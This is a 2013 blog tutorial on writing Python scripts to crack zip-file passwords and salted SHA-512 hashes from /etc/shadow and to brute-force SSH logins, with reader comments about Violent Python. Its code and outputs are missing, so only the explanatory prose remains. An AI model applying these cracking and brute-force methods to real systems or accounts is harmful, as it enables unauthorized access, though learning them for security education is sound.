Monday, 1 April 2013

Cracking passwords with python

Like i mentionned in "How to think like a hacker", programming is a fundamental skill, and python is an excellent language to start learning. What kind of exercice can we do? Well since we're interested in security applications, why not write scripts that can crack passwords! Let's try cracking zipfiles, SHA-512 hashes and a SSH server using python. I will assume you already have basic programming knowledge, at least understand the "hello world!" script. While there are already tools available to do so, like hashcat and hydra for example, and while I do not believe in reinventing the wheel, one must be at least able to build a somewhat "round wheel" before using such tools to understand the hacker's mindset.

Cracking password-protected zipfiles


We'll need to zip a file and lock it with a password to experiment with. In linux, we can use the following command to do so:
Now let's write our script:
Make the script executable with "chmod +x" and running it will produce this output:

Cracking SHA-512 hashes


In Linux, information about each users and their passwords is stored in /etc/shadow. In fact, it contains the hash of a user's password, and a salt. The default hash algorithm is SHA-512.

SHA stands for Secure Hash Algorithm and is a set of cryptographic hash functions designed by the National Security Agency. The process is irreversible therefore the only mean to find the password is to compare the hash values. Let's give it a try using python:

and the output:
We could use different algorithms as well. Some would require different functions to import such as the poplar phpbb3 used in web applications. Here's a way to test these passwords:

Bruteforcing SSH servers

Finally, lets see how to bruteforce a service such as SSH using python. I'll leave it to you to optimize it (hint: threading):

And the output:
Hope this will help you get started to craft your own tools to learn programming. Another lesson here:Use strong passwords!

You can ensure the safety of your defense if you only hold positions that cannot be attacked.

5 comments:

  1. I've started reading VIolent Python, which this challenged mentioned to try updating the script to crack sha-512 hashes. Using a plaintext wordlist, this doesn't work. I tried your code, and some others out there. Should the dictionary actually be a list of sha-512 hashes?

    ReplyDelete
  2. Needs a plaintext wordlist. I suggest you make your own wordlist using only a few words(including the password) to test. Your suggestion would be worth it if we didnt take the salt into account. Also, your text file (wordlist) format might be different according to your operating system. This example would probably not work in a MS windows environment.

    ReplyDelete
  3. The sha512 example worked great for me...also reading Violent Python. Thanks!

    ReplyDelete